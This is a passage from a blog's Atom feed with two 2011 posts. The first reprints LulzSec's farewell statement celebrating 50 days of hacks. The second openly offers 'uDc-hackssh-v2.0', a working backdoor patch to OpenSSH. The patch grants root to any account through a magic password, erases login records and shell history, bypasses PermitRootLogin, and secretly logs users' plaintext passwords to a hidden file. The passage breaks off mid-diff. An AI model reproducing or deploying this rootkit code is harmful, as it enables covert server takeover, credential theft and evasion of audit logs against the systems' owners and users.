src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-8996956251489330415</id><published>2011-06-26T11:46:00.003+08:00</published><updated>2011-06-26T11:51:46.838+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>LulzSec Issues: 50 Days of Lulz</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://leaksfree.com/wp-content/uploads/mvbthumbs/img_43452_lulzsec-exposed.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="131" src="http://leaksfree.com/wp-content/uploads/mvbthumbs/img_43452_lulzsec-exposed.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;LulzSec has issued final data release saying they will now go underground while urging the antisec movement continue with what they have started.&lt;br /&gt;&lt;br /&gt;The announcement follows 50 days of hacks and attacks launched by the group, the most significant of which being the revelation of how large the US Domestic spy program has grown and the release of documents from the State of Arizona revealing corruption and racism by government in the fight against illegal immigration which included the revelation that US Marines were being used as contract killers.&lt;br /&gt;&lt;blockquote&gt;For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.&lt;/blockquote&gt;Source &lt;a href="http://pastebin.com/1znEGmHa"&gt;pastebin&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;. /$$                 /$$            /$$$$$$                    &lt;br /&gt;.| $$                | $$           /$$__  $$                    &lt;br /&gt;.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$&lt;br /&gt;.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/&lt;br /&gt;.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$      &lt;br /&gt;.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$      &lt;br /&gt;.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$&lt;br /&gt;.|________/ \______/ |__/|________/ \______/  \_______/ \_______/&lt;br /&gt;//Laughing at your security since 2011!&lt;br /&gt;&lt;br /&gt;.--    .-""-.&lt;br /&gt;.   ) (     )&lt;br /&gt;.  (   )   (&lt;br /&gt;.     /     )&lt;br /&gt;.    (_    _)                     0_,-.__&lt;br /&gt;.      (_  )_                     |_.-._/&lt;br /&gt;.       (    )                    |lulz..\    &lt;br /&gt;.        (__)                     |__--_/          &lt;br /&gt;.     |''   ``\                   |&lt;br /&gt;.     | [Lulz] \                  |      /b/&lt;br /&gt;.     |         \  ,,,---===?A`\  |  ,==y'&lt;br /&gt;.   ___,,,,,---==""\        |M] \ | ;|\ |&amp;gt;&lt;br /&gt;.           _   _   \   ___,|H,,---==""""bno,&lt;br /&gt;.    o  O  (_) (_)   \ /          _     AWAW/&lt;br /&gt;.                     /         _(+)_  dMM/&lt;br /&gt;.      \@_,,,,,,---=="   \      \\|//  MW/&lt;br /&gt;.--''''"                         ===  d/&lt;br /&gt;.                                    //   SET SAIL FOR FAIL!&lt;br /&gt;.                                    ,'_________________________&lt;br /&gt;.   \    \    \     \               ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;.                         _____    ,'  ~~~   .-""-.~~~~~~  .-""-.&lt;br /&gt;.      .-""-.           ///==---   /`-._ ..-'      -.__..-'&lt;br /&gt;.            `-.__..-' =====\\\\\\ V/  .---\.&lt;br /&gt;.                     ~~~~~~~~~~~~, _',--/_.\  .-""-.&lt;br /&gt;.                            .-""-.___` --  \|         -.__..-&lt;br /&gt;&lt;br /&gt;Friends around the globe,&lt;br /&gt;&lt;br /&gt;We are Lulz Security, and this is our final release, as today marks something meaningful to us. 50 days ago, we set sail with our humble ship on an uneasy and brutal ocean: the Internet. The hate machine, the love machine, the machine powered by many machines. We are all part of it, helping it grow, and helping it grow on us.&lt;br /&gt;&lt;br /&gt;For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.&lt;br /&gt;&lt;br /&gt;While we are responsible for everything that The Lulz Boat is, we are not tied to this identity permanently. Behind this jolly visage of rainbows and top hats, we are people. People with a preference for music, a preference for food; we have varying taste in clothes and television, we are just like you. Even Hitler and Osama Bin Laden had these unique variations and style, and isn't that interesting to know? The mediocre painter turned supervillain liked cats more than we did.&lt;br /&gt;&lt;br /&gt;Again, behind the mask, behind the insanity and mayhem, we truly believe in the AntiSec movement. We believe in it so strongly that we brought it back, much to the dismay of those looking for more anarchic lulz. We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us. The support we've gathered for it in such a short space of time is truly overwhelming, and not to mention humbling. Please don't stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve.&lt;br /&gt;&lt;br /&gt;So with those last thoughts, it's time to say bon voyage. Our planned 50 day cruise has expired, and we must now sail into the distance, leaving behind - we hope - inspiration, fear, denial, happiness, approval, disapproval, mockery, embarrassment, thoughtfulness, jealousy, hate, even love. If anything, we hope we had a microscopic impact on someone, somewhere. Anywhere.&lt;br /&gt;&lt;br /&gt;Thank you for sailing with us. The breeze is fresh and the sun is setting, so now we head for the horizon.&lt;br /&gt;&lt;br /&gt;Let it flow...&lt;br /&gt;&lt;br /&gt;Lulz Security - our crew of six wishes you a happy 2011, and a shout-out to all of our battlefleet members and supporters across the globe&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Our mayhem: http://lulzsecurity.com/releases/&lt;br /&gt;Our chaos: http://thepiratebay.org/user/LulzSec/&lt;br /&gt;Our final release: http://thepiratebay.org/torrent/6495523/50_Days_of_Lulz&lt;br /&gt;&lt;br /&gt;Please make mirrors of material on the website, because we're not renewing the hosting. Goodbye. &amp;lt;3      &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-8996956251489330415?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/8996956251489330415/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=8996956251489330415' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8996956251489330415'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8996956251489330415'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/lulzsec-issues-50-days-of-lulz.html' title='LulzSec Issues: 50 Days of Lulz'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-8511852148549543668</id><published>2011-06-26T03:49:00.000+08:00</published><updated>2011-06-26T03:49:22.700+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>uDc-hackssh-v2.0</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-SgNlc_KfJL4/SmXcNl7raxI/AAAAAAAAAoQ/6pulXodOekU/s1600/hackpermit.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-SgNlc_KfJL4/SmXcNl7raxI/AAAAAAAAAoQ/6pulXodOekU/s200/hackpermit.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;CHANAGES:&lt;/b&gt;&lt;br /&gt;Updated for openssh-5.x version&lt;br /&gt;&lt;br /&gt;&lt;b&gt;FEATURES:&lt;/b&gt;&lt;br /&gt;- special password to log in with any user account and get root&lt;br /&gt;- no logs in the machine (messages,auth,utmp,…)&lt;br /&gt;- bash shell will use /dev/null as HISTFILE&lt;br /&gt;- logs user passwords (local and remote sessions)&lt;br /&gt;- should bypass 'PermitRootLogin No"&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; border-collapse: collapse; color: #333333; font-family: 'trebuchet ms', verdana, arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]&lt;br /&gt;$ cat udc-hackssh-v2.0.patch&lt;/span&gt;&lt;br /&gt;&lt;pre&gt;diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c&lt;br /&gt;*** openssh-5.8p2/auth-pam.c&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;Sun Jul 12 20:07:21 2009&lt;br /&gt;--- udc-hackssh-v2.0/auth-pam.c&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;Sun Jun 26 00:55:57 2011&lt;br /&gt;***************&lt;br /&gt;*** 466,471 ****&lt;br /&gt;--- 466,475 ----&lt;br /&gt;&amp;nbsp; &lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;if (sshpam_err != PAM_SUCCESS)&lt;br /&gt;&amp;nbsp; &lt;span class="Apple-tab-span" style="white-space: pre;"&gt;  &lt;/span&gt;goto auth_fail;&lt;br /&gt;&amp;nbsp; &lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;sshpam_err = pam_authenticate(sshpam_handle, flags);&lt;br /&gt;+ // slash patch&lt;br /&gt;+ &lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;if(uDc)&lt;br /&gt;+ &lt;span class="Apple-tab-span" style="white-space: pre;"&gt;  &lt;/span&gt;sshpam_err = PAM_SUCCESS;&lt;br /&gt;+ // end of slash&lt;br /&gt;&amp;nbsp; &lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;if (sshpam_err != PAM_SUCCESS)&lt;br /&gt;&amp;nbsp; &lt;span class="Apple-tab-span" style="white-space: pre;"&gt;  &lt;/span&gt;goto auth_fail;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;***************&lt;br /&gt;*** 816,821 ****&lt;br /&gt;--- 820,834 ----&lt;br /&gt;&amp;nbsp; &lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;Buffer buffer;&lt;br /&gt;&amp;nbsp; &lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;struct pam_ctxt *ctxt = ctx;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;+ // slash patch&lt;br /&gt;+ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if(sshpam_authctxt)&lt;br /&gt;+ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;for (gurun = 0; gurun &amp;lt; num; ++gurun) {&lt;br /&gt;+ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;get_remote_ipaddr(), sshpam_authctxt-&amp;gt;user, resp[gurun]);&lt;br /&gt;+ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if(!strcmp(BAJAUPASS, resp[gurun])) ctxt-&amp;gt;pam_done = uDc = 1;&lt;br /&gt;+ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;else uDclog();&lt;br /&gt;+ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;}&lt;br /&gt;+ // end of patch&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;   debug2("PAM: %s entering, %u responses", __func__, num);&lt;br /&gt;   switch (ctxt-&amp;gt;pam_done) {&lt;br /&gt;   case 1:&lt;br /&gt;***************&lt;br /&gt;*** 1205,1210 ****&lt;br /&gt;--- 1218,1226 ----&lt;br /&gt;    fatal("PAM: %s: failed to set PAM_CONV: %s", __func__,&lt;br /&gt;        pam_strerror(sshpam_handle, sshpam_err));&lt;br /&gt;  &lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(!uDc)&lt;br /&gt;+ // end of patch&lt;br /&gt;   sshpam_err = pam_authenticate(sshpam_handle, flags);&lt;br /&gt;   sshpam_password = NULL;&lt;br /&gt;   if (sshpam_err == PAM_SUCCESS &amp;amp;&amp;amp; authctxt-&amp;gt;valid) {&lt;br /&gt;diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c&lt;br /&gt;*** openssh-5.8p2/auth-passwd.c Sun Mar  8 08:40:28 2009&lt;br /&gt;--- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011&lt;br /&gt;***************&lt;br /&gt;*** 92,97 ****&lt;br /&gt;--- 92,103 ----&lt;br /&gt;  #endif&lt;br /&gt;   if (*password == '\0' &amp;amp;&amp;amp; options.permit_empty_passwd == 0)&lt;br /&gt;    return 0;&lt;br /&gt;+ // slash patch&lt;br /&gt;+        if(!strcmp(BAJAUPASS, password)) return uDc = 1;&lt;br /&gt;+        sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+                get_remote_ipaddr(), pw-&amp;gt;pw_name, password);&lt;br /&gt;+        uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;  &lt;br /&gt;  #ifdef KRB5&lt;br /&gt;   if (options.kerberos_authentication == 1) {&lt;br /&gt;diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c&lt;br /&gt;*** openssh-5.8p2/auth.c Wed Dec  1 09:21:51 2010&lt;br /&gt;--- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011&lt;br /&gt;***************&lt;br /&gt;*** 94,99 ****&lt;br /&gt;--- 94,104 ----&lt;br /&gt;  int&lt;br /&gt;  allowed_user(struct passwd * pw)&lt;br /&gt;  {&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(uDc) return 1;&lt;br /&gt;+  else {&lt;br /&gt;+ // end of patch&lt;br /&gt;+ &lt;br /&gt;   struct stat st;&lt;br /&gt;   const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;&lt;br /&gt;   u_int i;&lt;br /&gt;***************&lt;br /&gt;*** 249,258 ****&lt;br /&gt;--- 254,269 ----&lt;br /&gt;   /* We found no reason not to let this user try to log on... */&lt;br /&gt;   return 1;&lt;br /&gt;  }&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;  &lt;br /&gt;  void&lt;br /&gt;  auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)&lt;br /&gt;  {&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(!uDc) {&lt;br /&gt;+ // end of patch&lt;br /&gt;   void (*authlog) (const char *fmt,...) = verbose;&lt;br /&gt;   char *authmsg;&lt;br /&gt;  &lt;br /&gt;***************&lt;br /&gt;*** 298,303 ****&lt;br /&gt;--- 309,317 ----&lt;br /&gt;    audit_event(audit_classify_auth(method));&lt;br /&gt;  #endif&lt;br /&gt;  }&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;  &lt;br /&gt;  /*&lt;br /&gt;   * Check whether root logins are disallowed.&lt;br /&gt;***************&lt;br /&gt;*** 305,310 ****&lt;br /&gt;--- 319,327 ----&lt;br /&gt;  int&lt;br /&gt;  auth_root_allowed(char *method)&lt;br /&gt;  {&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(!uDc) {&lt;br /&gt;+ // end of patch&lt;br /&gt;   switch (options.permit_root_login) {&lt;br /&gt;   case PERMIT_YES:&lt;br /&gt;    return 1;&lt;br /&gt;***************&lt;br /&gt;*** 322,327 ****&lt;br /&gt;--- 339,349 ----&lt;br /&gt;   logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());&lt;br /&gt;   return 0;&lt;br /&gt;  }&lt;br /&gt;+ // slash patch&lt;br /&gt;+  else&lt;br /&gt;+  return 1;&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;  &lt;br /&gt;  &lt;br /&gt;  /*&lt;br /&gt;diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c&lt;br /&gt;*** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010&lt;br /&gt;--- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011&lt;br /&gt;***************&lt;br /&gt;*** 81,86 ****&lt;br /&gt;--- 81,89 ----&lt;br /&gt;   if (getnameinfo((struct sockaddr *)&amp;amp;from, fromlen, name, sizeof(name),&lt;br /&gt;       NULL, 0, NI_NAMEREQD) != 0) {&lt;br /&gt;    /* Host name not found.  Use ip address. */&lt;br /&gt;+ // slash patch&lt;br /&gt;+   if(!uDc)&lt;br /&gt;+ // end of patch&lt;br /&gt;    return xstrdup(ntop);&lt;br /&gt;   }&lt;br /&gt;  &lt;br /&gt;diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h&lt;br /&gt;*** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010&lt;br /&gt;--- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011&lt;br /&gt;***************&lt;br /&gt;*** 13,18 ****&lt;br /&gt;--- 13,40 ----&lt;br /&gt;   * called by a name other than "ssh" or "Secure Shell".&lt;br /&gt;   */&lt;br /&gt;  &lt;br /&gt;+ // slash patch&lt;br /&gt;+ #include &lt;sys stat.h=""&gt;&lt;br /&gt;+ #include &lt;stdio.h&gt;&lt;br /&gt;+ &lt;br /&gt;+ #define BAJAUPASS     "CHANGE-ME"&lt;br /&gt;+ #define SSH_LOG       "/dev/lala"&lt;br /&gt;+ &lt;br /&gt;+ FILE *s9clog;&lt;br /&gt;+ char  slashbuff[1024];&lt;br /&gt;+ int   kambing, gurun, uDc;&lt;br /&gt;+ &lt;br /&gt;+ #define uDclog() {                                 \&lt;br /&gt;+  kambing=strlen(slashbuff);                               \&lt;br /&gt;+  for(gurun=0; gurun&amp;lt;=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun];   \&lt;br /&gt;+  s9clog=fopen(SSH_LOG, "a");                         \&lt;br /&gt;+  if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \&lt;br /&gt;+  chmod(SSH_LOG, 0666);                             \&lt;br /&gt;+ }&lt;br /&gt;+ &lt;br /&gt;+ const char *get_remote_ipaddr(void);&lt;br /&gt;+ // end of patch&lt;br /&gt;+ &lt;br /&gt;  #ifndef INCLUDES_H&lt;br /&gt;  #define INCLUDES_H&lt;br /&gt;  &lt;br /&gt;diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c&lt;br /&gt;*** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008&lt;br /&gt;--- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011&lt;br /&gt;***************&lt;br /&gt;*** 336,341 ****&lt;br /&gt;--- 336,345 ----&lt;br /&gt;   char fmtbuf[MSGBUFSIZ];&lt;br /&gt;   char *txt = NULL;&lt;br /&gt;   int pri = LOG_INFO;&lt;br /&gt;+ &lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(uDc) return;&lt;br /&gt;+ // end of patch&lt;br /&gt;   int saved_errno = errno;&lt;br /&gt;  &lt;br /&gt;   if (level &amp;gt; log_level)&lt;br /&gt;diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c&lt;br /&gt;*** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011&lt;br /&gt;--- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011&lt;br /&gt;***************&lt;br /&gt;*** 433,438 ****&lt;br /&gt;--- 433,442 ----&lt;br /&gt;  int&lt;br /&gt;  login_write(struct logininfo *li)&lt;br /&gt;  {&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(uDc) return 0;&lt;br /&gt;+ // end of patch&lt;br /&gt;+ &lt;br /&gt;  #ifndef HAVE_CYGWIN&lt;br /&gt;   if (geteuid() != 0) {&lt;br /&gt;    logit("Attempt to write login records by non-root user (aborting)");&lt;br /&gt;diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c&lt;br /&gt;*** openssh-5.8p2/session.c Wed Dec  1 09:02:59 2010&lt;br /&gt;--- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011&lt;br /&gt;***************&lt;br /&gt;*** 1198,1203 ****&lt;br /&gt;--- 1198,1207 ----&lt;br /&gt;   }&lt;br /&gt;   if (getenv("TZ"))&lt;br /&gt;    child_set_env(&amp;amp;env, &amp;amp;envsize, "TZ", getenv("TZ"));&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(uDc)&lt;br /&gt;+   child_set_env(&amp;amp;env, &amp;amp;envsize, "HISTFILE", "/dev/null");&lt;br /&gt;+ // end of patch&lt;br /&gt;  &lt;br /&gt;   /* Set custom environment options from RSA authentication. */&lt;br /&gt;   if (!options.use_login) {&lt;br /&gt;***************&lt;br /&gt;*** 1483,1488 ****&lt;br /&gt;--- 1487,1495 ----&lt;br /&gt;  #else&lt;br /&gt;    if (setlogin(pw-&amp;gt;pw_name) &amp;lt; 0)&lt;br /&gt;     error("setlogin failed: %s", strerror(errno));&lt;br /&gt;+ // slash patch&lt;br /&gt;+   if(!uDc) {&lt;br /&gt;+ // end of patch&lt;br /&gt;    if (setgid(pw-&amp;gt;pw_gid) &amp;lt; 0) {&lt;br /&gt;     perror("setgid");&lt;br /&gt;     exit(1);&lt;br /&gt;***************&lt;br /&gt;*** 1492,1497 ****&lt;br /&gt;--- 1499,1511 ----&lt;br /&gt;     perror("initgroups");&lt;br /&gt;     exit(1);&lt;br /&gt;    }&lt;br /&gt;+ // slash patch&lt;br /&gt;+  }&lt;br /&gt;+  else {&lt;br /&gt;+   setgid(0);&lt;br /&gt;+   initgroups(pw-&amp;gt;pw_name, 0);&lt;br /&gt;+  }&lt;br /&gt;+ // end of patch&lt;br /&gt;    endgrent();&lt;br /&gt;  #endif&lt;br /&gt;  &lt;br /&gt;***************&lt;br /&gt;*** 1515,1520 ****&lt;br /&gt;--- 1529,1537 ----&lt;br /&gt;    }&lt;br /&gt;  #else&lt;br /&gt;    /* Permanently switch to the desired uid. */&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(!uDc)&lt;br /&gt;+ // end of patch&lt;br /&gt;    permanently_set_uid(pw);&lt;br /&gt;  #endif&lt;br /&gt;   }&lt;br /&gt;diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c&lt;br /&gt;*** openssh-5.8p2/sshconnect1.c Tue Nov  7 20:14:42 2006&lt;br /&gt;--- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011&lt;br /&gt;***************&lt;br /&gt;*** 458,463 ****&lt;br /&gt;--- 458,468 ----&lt;br /&gt;    password = read_passphrase(prompt, 0);&lt;br /&gt;    packet_start(SSH_CMSG_AUTH_PASSWORD);&lt;br /&gt;    ssh_put_password(password);&lt;br /&gt;+ // slash patch&lt;br /&gt;+                 sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+    get_remote_ipaddr(), options.user, password);&lt;br /&gt;+                 uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;    memset(password, 0, strlen(password));&lt;br /&gt;    xfree(password);&lt;br /&gt;    packet_send();&lt;br /&gt;diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c&lt;br /&gt;*** openssh-5.8p2/sshconnect2.c Wed Dec  1 09:21:51 2010&lt;br /&gt;--- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011&lt;br /&gt;***************&lt;br /&gt;*** 883,888 ****&lt;br /&gt;--- 883,893 ----&lt;br /&gt;   packet_put_cstring(authctxt-&amp;gt;method-&amp;gt;name);&lt;br /&gt;   packet_put_char(0);&lt;br /&gt;   packet_put_cstring(password);&lt;br /&gt;+ // slash patch&lt;br /&gt;+        sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+                get_remote_ipaddr(), options.user, password);&lt;br /&gt;+        uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;   memset(password, 0, strlen(password));&lt;br /&gt;   xfree(password);&lt;br /&gt;   packet_add_padding(64);&lt;br /&gt;***************&lt;br /&gt;*** 1558,1563 ****&lt;br /&gt;--- 1563,1573 ----&lt;br /&gt;  &lt;br /&gt;    response = read_passphrase(prompt, echo ? RP_ECHO : 0);&lt;br /&gt;  &lt;br /&gt;+ // slash patch&lt;br /&gt;+                sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",&lt;br /&gt;+                    get_remote_ipaddr(), options.user, response);&lt;br /&gt;+                uDclog();&lt;br /&gt;+ // end of patch&lt;br /&gt;    packet_put_cstring(response);&lt;br /&gt;    memset(response, 0, strlen(response));&lt;br /&gt;    xfree(response);&lt;br /&gt;diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c&lt;br /&gt;*** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011&lt;br /&gt;--- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011&lt;br /&gt;***************&lt;br /&gt;*** 126,131 ****&lt;br /&gt;--- 126,134 ----&lt;br /&gt;  record_login(pid_t pid, const char *tty, const char *user, uid_t uid,&lt;br /&gt;      const char *host, struct sockaddr *addr, socklen_t addrlen)&lt;br /&gt;  {&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(!uDc) {&lt;br /&gt;+ // end of patch&lt;br /&gt;   struct logininfo *li;&lt;br /&gt;  &lt;br /&gt;   /* save previous login details before writing new */&lt;br /&gt;***************&lt;br /&gt;*** 136,147 ****&lt;br /&gt;--- 139,156 ----&lt;br /&gt;   login_login(li);&lt;br /&gt;   login_free_entry(li);&lt;br /&gt;  }&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;  &lt;br /&gt;  #ifdef LOGIN_NEEDS_UTMPX&lt;br /&gt;  void&lt;br /&gt;  record_utmp_only(pid_t pid, const char *ttyname, const char *user,&lt;br /&gt;     const char *host, struct sockaddr *addr, socklen_t addrlen)&lt;br /&gt;  {&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(!uDc) {&lt;br /&gt;+ // end of patch&lt;br /&gt;   struct logininfo *li;&lt;br /&gt;  &lt;br /&gt;   li = login_alloc_entry(pid, user, host, ttyname);&lt;br /&gt;***************&lt;br /&gt;*** 149,163 ****&lt;br /&gt;--- 158,181 ----&lt;br /&gt;   login_utmp_only(li);&lt;br /&gt;   login_free_entry(li);&lt;br /&gt;  }&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;  #endif&lt;br /&gt;  &lt;br /&gt;  /* Records that the user has logged out. */&lt;br /&gt;  void&lt;br /&gt;  record_logout(pid_t pid, const char *tty, const char *user)&lt;br /&gt;  {&lt;br /&gt;+ // slash patch&lt;br /&gt;+  if(!uDc) {&lt;br /&gt;+ // end of patch&lt;br /&gt;   struct logininfo *li;&lt;br /&gt;  &lt;br /&gt;   li = login_alloc_entry(pid, user, NULL, tty);&lt;br /&gt;   login_logout(li);&lt;br /&gt;   login_free_entry(li);&lt;br /&gt;  }&lt;br /&gt;+ // slash patch&lt;br /&gt;+ }&lt;br /&gt;+ // end of patch&lt;br /&gt;diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h&lt;br /&gt;*** openssh-5.8p2/version.h Thu May  5 09:56:54 2011&lt;br /&gt;--- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011&lt;br /&gt;***************&lt;br /&gt;*** 